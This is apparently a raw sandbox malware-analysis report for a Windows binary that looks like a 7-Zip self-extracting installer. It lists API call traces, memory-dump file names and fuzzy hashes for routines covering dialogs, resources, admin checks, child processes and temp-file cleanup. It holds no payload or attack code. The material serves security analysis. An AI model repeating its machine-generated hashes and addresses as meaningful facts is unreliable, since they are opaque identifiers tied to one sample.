                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                                • String ID: 7zSfxString%d
                                                                                                                                                                • API String ID: 2117570002-3906403175
                                                                                                                                                                • Opcode ID: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                                                                                                                • Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
                                                                                                                                                                • Opcode Fuzzy Hash: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                                                                                                                • Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 004092EE
                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 00409344
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 00409359
                                                                                                                                                                • SetWindowLongW.USER32(00000000), ref: 0040935C
                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
                                                                                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040939E
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 004093A1
                                                                                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
                                                                                                                                                                • CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00409411
                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00409414
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00409424
                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 00409427
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040943B
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040943E
                                                                                                                                                                  • Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC
                                                                                                                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                  • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                  • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1057135554-0
                                                                                                                                                                • Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                                                • Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
                                                                                                                                                                • Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                                                • Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402156
                                                                                                                                                                • wsprintfW.USER32 ref: 00402175
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040218D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                                                • API String ID: 2639302590-365843014
                                                                                                                                                                • Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                                                • Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
                                                                                                                                                                • Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                                                • Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9
                                                                                                                                                                APIs
                                                                                                                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                • lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 829399097-0
                                                                                                                                                                • Opcode ID: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                                                                                                                • Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
                                                                                                                                                                • Opcode Fuzzy Hash: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                                                                                                                • Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
                                                                                                                                                                • lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
                                                                                                                                                                • lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00403291
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 004032A3
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 004032BD
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 004032C6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032D1
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032DC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1862581289-0
                                                                                                                                                                • Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                                                • Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
                                                                                                                                                                • Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                                                • Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408DDA
                                                                                                                                                                • SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408DF4
                                                                                                                                                                • SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00408E25
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentHookThreadWindows$Dialog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1967849563-0
                                                                                                                                                                • Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                                                • Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
                                                                                                                                                                • Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                                                • Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69
                                                                                                                                                                APIs
                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
                                                                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
                                                                                                                                                                • FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3429775523-0
                                                                                                                                                                • Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                                                • Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
                                                                                                                                                                • Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                                                • Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29
                                                                                                                                                                APIs
                                                                                                                                                                • GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040556D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00405575
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040557D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00405585
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040558D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 00405595
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 0040559D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004055A5
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004055AD
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055B5
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040560A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405612
                                                                                                                                                                • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
                                                                                                                                                                • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
                                                                                                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
                                                                                                                                                                • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
                                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
                                                                                                                                                                • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
                                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                                                                                                • String ID: " -$sfxwaitall
                                                                                                                                                                • API String ID: 2734624574-3991362806
                                                                                                                                                                • Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                                                • Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
                                                                                                                                                                • Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                                                                                                                • Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69
                                                                                                                                                                APIs
                                                                                                                                                                • _wtol.MSVCRT ref: 00403B78
                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,0041EA00,00000000,0041E9F4), ref: 00403C1B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403C8C
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403C94
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403C9C
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403CA4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403CAC
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403CB4
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403CBC
                                                                                                                                                                • _wtol.MSVCRT ref: 00403D12
                                                                                                                                                                • CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403E4B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403E53
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403E5B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403E63
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403E6B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403E73
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403E7B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403E81
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403E89
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                                                • String ID: .lnk$[@
                                                                                                                                                                • API String ID: 408529070-3575931549
                                                                                                                                                                • Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                                                • Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
                                                                                                                                                                • Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                                                • Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58
                                                                                                                                                                APIs
                                                                                                                                                                • _wtol.MSVCRT ref: 004050E7
                                                                                                                                                                • _wtol.MSVCRT ref: 00405103
                                                                                                                                                                • lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                  • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                  • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00ABA1E8,?), ref: 00402541
                                                                                                                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00ABA1E8), ref: 00402551
                                                                                                                                                                  • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                  • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                  • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
